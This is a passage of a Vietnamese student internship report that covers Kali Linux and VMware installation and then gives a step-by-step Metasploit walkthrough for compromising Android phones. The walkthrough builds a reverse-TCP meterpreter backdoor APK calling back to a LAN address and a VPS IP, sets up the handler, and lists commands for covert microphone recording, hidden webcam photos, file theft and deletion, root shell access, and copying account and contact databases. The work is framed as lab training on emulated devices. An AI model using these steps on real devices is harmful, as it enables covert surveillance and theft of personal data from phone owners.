21 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với

BackTrack, Kali có rất nhiều cải tiến:

Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ

phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được

các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-

to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của

Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ

thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay

đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến

trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có

thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là

sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB

Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng

không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với

giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME,

KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều

hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta

đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).

Page 22: Thực tập

22 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã

dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không

phải cài lại mới hoàn toàn nữa.

3) Cài đặt Vmware và cài đặt Kali trên Vmware

Cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến

hành cài phiên bản Kali Linux 1.0.9 64 bit ( Khuyến cao nên dùng phiên bản Kali linux

1.0.9 32 bit, vì bản này thông dụng, phiên bản metasploit framework nhiều hơn bản 64

bit). http://ww.kalwi.org/downloads/

Bạn là 1 kỹ sư công nghệ thông tin, thì không nhiều thì ít các bạn cũng có sử dụng

qua công cụ tạo máy ảo, mình sẽ giới thiệu phần mềm VMware. VMware Workstation là

một phần mềm tạo máy ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy

Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một

phần mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính

năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo.

Page 23: Thực tập

23 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Để download được Vmware ta có thể download từ nhiều trang khác nhau, ta vào

https://www.google.com.vn/ và gõ Vmware 10 thì sẽ search được rất nhiều địa chỉ để ta

download.

Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc

dùng phím tắt Ctrl + N).

Page 24: Thực tập

24 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Chọn Custom và nhấn next.

Tại bước này ta chọn installer và chọn đĩa iso kali cần cài đặt làm máy ảo

Page 25: Thực tập

25 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Chọn tên và chỗ lưu máy ảo

Tiếp tục nhấn next, next và chọn thanh ram cho máy ảo

Page 26: Thực tập

26 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Tiếp tục ta chọn Use Bridge networking->next

Ta chọn LSI logic->next

Page 27: Thực tập

27 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Ta chọn SCSI->next

Ta chọn Create a new virtual disk->next

Page 28: Thực tập

28 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Tiếp tục nhấn next ,ta chọn dung lượng ổ cứng cho Máy Kali

Sau khi nhấn Finish thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt. Tùy vào ổ cứng ram

mà ta chọn cho máy ảo thì sẽ cài đặ nhanh hoặc chậm

Page 29: Thực tập

29 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

.

Nếu máy tính bạn gặp trường hợp này thì hãy kiểm tra theo từng bước của lỗi.Trường hợp

này, máy tính chưa bật chức năng ảo hóa trong Bios, cách xử lí trường hợp này bằng cách,

restars máy tính => bấm F2 liên tục để vào Bios tìm mục Advance rồi chỉnh enable intel

VT.Khởi động lại và tiếp tục mở Vmware để cài đặt.

Nếu máy tính bạn không gặp trường hợp này thì tiếp tục và cài đặt bình thường.

Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt

là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install

Page 30: Thực tập

30 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue

Chọn nước

Page 31: Thực tập

31 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng.

set Hostname

Page 32: Thực tập

32 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

set password user root

Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.

Partition disks (Step 1)

Page 33: Thực tập

33 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Partition disks (Step 2)

Partition disks (Step 3)

Page 34: Thực tập

34 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Partition disks (Step 4)

Partition disks (Step 5)

Page 35: Thực tập

35 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Partition disks (Step 6)

Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.

Page 36: Thực tập

36 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Cài đặt hệ thống

Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng

dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn

chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của

Kali.

Tiếp đến là cài đặt GRUB

Page 37: Thực tập

37 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Cuối cùng, nhấp vào Continue để khởi động lại Kali

Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.

Page 38: Thực tập

38 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Giao diện sau khi cài đặt xong Hệ điều hành Kali linux

Page 39: Thực tập

39 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Phần 1: Làm trên mạng local Lan

1.Tạo mã độc trên Kali Linux Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy

android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy

ảo Kali Linux bằng Vmware.

Đầu tiên mở 1 terminal và gõ dòng lệnh:

msfpayload android/meterpreter/reverse_tcp lhost=192.168.29.129 lport=8080

R > /root/Desktop/files.apk

Xem địa chỉ máy ip kali bằng cách mở 1 terminal mới và nhập lệnh “ifconfig” và ta

sẽ nhận được 1 địa chỉ ip:192.168.29.129

Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus

máy tính để thực thi mã độc.

Câu lệnh giúp ta tạo ra 1 phần mềm độc hại tích hợp trên file.apk giúp ta mở ra kết

nối với victim (backdoor), nhiệm vụ của haker là gửi cho vicim “files.apk” này, khi victim

vô tình tải về “file.apk” ta sẽ có 1 phiên kết nối ngược gửi về địa chỉ host của máy kali :

192.168.29.129 thông qua port 8080 (port websever)

Tiếp theo, gõ lệnh msfconsole

Page 40: Thực tập

40 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách

gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.29.129 – [nhập địa chỉ IP giống với khi tạo payload ở trên].

set lport 8080 – [nhập port giống với port khi tạo payload ở trên].

Exploit

Page 41: Thực tập

41 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

2.Đưa mã độc vào thiết bị android

Phần 4 ta đã tạo ra 1 file app.apk chứa mã độc, ta sẽ tung lên mạng, và dùng đt ảo

tải file app.apk về.

Để cài đặt được app này thì bạn phải check vào ô “Unknown sources” –cho phép

cài đặt tất cả các app không rõ nguồn gốc.

Page 42: Thực tập

42 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Cài đặt files.apk, và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP”:

Page 43: Thực tập

43 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Khi ta nhấp vào ReverseTcp thì lập tức backdoor sẽ mở ra và ta có 1 phiên kết nối

với victim.

Sử dụng lệnh help.

Sử dụng lệnh Record_mic:

Lưu file ghi âm về máy trong thư mục root

Page 44: Thực tập

44 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sử dụng lệnh Webcam_snap 1 để chụp hình

File hình đã chụp từ camera của máy android là vEYWFBxp.jpeg được lưu ở thư

mục root của máy.

Sử dụng lệnh Webcam_stream

Page 45: Thực tập

45 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sử dụng lệnh Sysinfo:

3.Xâm nhập SD card của thiết bị android

Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục

Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục và dùng lệnh ls đề liệt kê ra các

file có trong thư mục Download.

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download

App.apk. Và file này sẽ được tải về thư mục /root của máy Kali.

Page 46: Thực tập

46 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Phần 2: Làm trên môi trường VPS

1. Giới thiệu về VPS

Định nghĩa

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật

lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có

hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng

1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn

quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100%

khả năng bị hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài

nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến

các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì

mọi tài khoản khác trên VPS đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng,

nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử

dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,….

Đặc điểm về thông số VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung

lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng

khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt

Web trên VPS, dowload/upload bittorrent với tốc độ cao…

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà

không cần phải khởi động lại hệ thống.

Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.

Giá trị khi sử dụng VPS

Page 47: Thực tập

47 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù

hợp.

Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.

Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.

Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.

Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.

2. Cài đặt mã độc trên VPS

Giới thiệu

Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,

tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng

đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit

có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac OS.

Cài đặt Metasploit Framework

Page 48: Thực tập

48 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Các bước tiếp theo ta thực hiện Step-by-Step là được:

Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:

Page 49: Thực tập

49 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Chọn server và ngày hết hạn, để mặc định:

Quá trình cài đặt của Metasploit:

Page 50: Thực tập

50 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:

Sau khi Finish trình duyệt web mở lên và đi tới giao diện

Page 51: Thực tập

51 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào

Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi

chọn Create Account:

Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn

phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:

Page 52: Thực tập

52 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Giao diện chương trình Metasploit Console

3. Từ VPS xâm nhập vào thiết bị Android

a. Các bước thực hiện

Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang

LAN với địa chỉ IP là địa chỉ của VPS

Chúng ta vẫn sử dụng lệnh:

msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R >

/root/Desktop/files.apk

Page 53: Thực tập

53 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Ở đây địa chỉ VPS là 14.0.21.162

Khởi động Metasploit Console trên VPS

Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử

dụng chính IP của VPS

Page 54: Thực tập

54 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

b.Tấn công điện thoại Android:

Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài

chục phút.

Tiến hành thiết đặt payload bằng các lệnh

“ use exploit/multi/handler ”

“ set payload android/meterpreter/reverse_tcp ”

“ set lhost 14.0.21.162 ”

“ set lport 4444 ”

“show options”

“ run ”

Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở

trên.

Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android

nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông

báo như sau:

Page 55: Thực tập

55 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác

Ghi âm lén:

Sử dụng lệnh: “ record_mic <số giây ghi âm> ”

Sử dụng camera:

Xem danh sách webcam của thiết bị: “ webcam_list ”

Chụp ảnh lén: “webcam_snap <mã camera>”

Page 56: Thực tập

56 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Tải và xóa file bất kỳ từ bộ nhớ sdcard:

Di chuyển vào thư mục bằng lệnh: cd

Tải về bằng lệnh: download <tên file>

Xóa tập tin bằng lệnh: rm <tên file>

Truy cập trực tiếp vào hệ thống:

Truy cập vào hệ thống bằng lệnh: “shell” > “su”

Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”

Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể

tiếp tục tấn công.

Truy cập và khai thác tài khoản người dùng:

Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”

Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”

Page 57: Thực tập

57 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Trở về meterpreter (Nhấp Ctrl+C) và tải file accounts.db về:

Page 58: Thực tập

58 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db

Truy cập và đánh cắp danh bạ điện thoại:

Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:

“cd /data/data/com.android.providers.contacts/databases”

Copy về thẻ sdcard và tải về máy

Page 59: Thực tập

59 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Xem nội dung của contacts2.db bằng SQLite Manager

Page 60: Thực tập

60 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

Một số câu lệnh khác:

- Để biết thêm về các lệnh có thể thực hiện ta dùng help

- Để xem thông tin về máy, nhập lệnh sysinfo

- Để xem các tác vụ đang chạy gõ ps

- Xem ip của máy bị hack ta gõ ipconfig

- Xem danh sách thư mục, file gõ ls

- Để upload gõ lệnh upload

- ls -l danh mục file và các quyền

- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

Page 61: Thực tập

61 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

- Để xem danh sách và down load các file hay thay đổi các file trong ROM

Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

Ctrl + C để quay lại

Page 62: Thực tập

62 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

C.KẾT QUẢ

NHỮNG VIỆC ĐÃ LÀM ĐƯỢC

- VỆ SINH MÁY TÍNH

- SỬA LỖI DISK 100%

- SỬA LỖI RAM CHẠY Ì ẠCH, KHIẾN MÁY BỊ TẮT KHI DÙNG VMWARE,

2 MÁY ẢO ANDROID, MÁY QUAY PHIM BB

- KHẮC PHỤC LỖI DÙNG VPS TẤN CÔNG MÁY ANDROID KHÔNG

THÀNH CÔNG DO PHIÊN BẢN METASPLOIT CŨ

Những kiến thức lý thuyết đã được củng cố:

Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android

Tìm hiểu về hệ điều hành Kali Linux

Tìm hiểu về các lỗ hổng bảo mật của Windows và Android

Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng

Những kỹ năng thực hành đã được học thêm:

Thực hiện cài đặt Android trên máy ảo

Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của

Windows và Android

Thi lấy chứng chỉ System Hacking của trung tâm Athena

Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào

Android

Biết thêm về một số bài học trong lớp Hacker mũ trắng

Những kinh nghiệm thực tiễn đã tích lũy được:

Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu,

thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới

bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh

nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua

các kĩ năng giao tiếp và ứng xử.

Page 63: Thực tập

63 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

D .DANH SÁCH CÁC CLIP:

- Clip giới thiệu về bản thân và trung tâm Athena:

https://www.youtube.com/watch?v=N501TeA2E4g

- Clip khó khăn thuận lợi: https://www.youtube.com/watch?v=RPk9iQ_RnPY

- Cài Vmware: https://www.youtube.com/watch?v=pZ-e7k87pdk

- Cài Kali Linux: https://www.youtube.com/watch?v=P0qA276m754

- Cài Genymotion android ảo: https://www.youtube.com/watch?v=wcRlmx2JNxQ

- Tạo mã độc trên Kali linux xâm nhập android ảo đánh cắp dữ liệu:

https://www.youtube.com/watch?v=HnW2rjVUx04

- Cài đặt phần mềm chứa mã độc icalendar

https://www.youtube.com/watch?v=0mdCkXwMnEc

- Tạo mã độc trên VPS cho phép đánh cắp dữ liệu android

https://www.youtube.com/watch?v=_JUgsUfIvIU

E. PHỤ LỤC : TRÍCH DẪN NGUỒN

THAM KHẢO

http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-may-

android-110510

http://sinhvienit.net/forum

Page 64: Thực tập

64 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

http://forum.bkav.com.vn

http://developer.android.com/sdk/index.html#download

http://www.oracle.com/technetwork/java/javase/downloads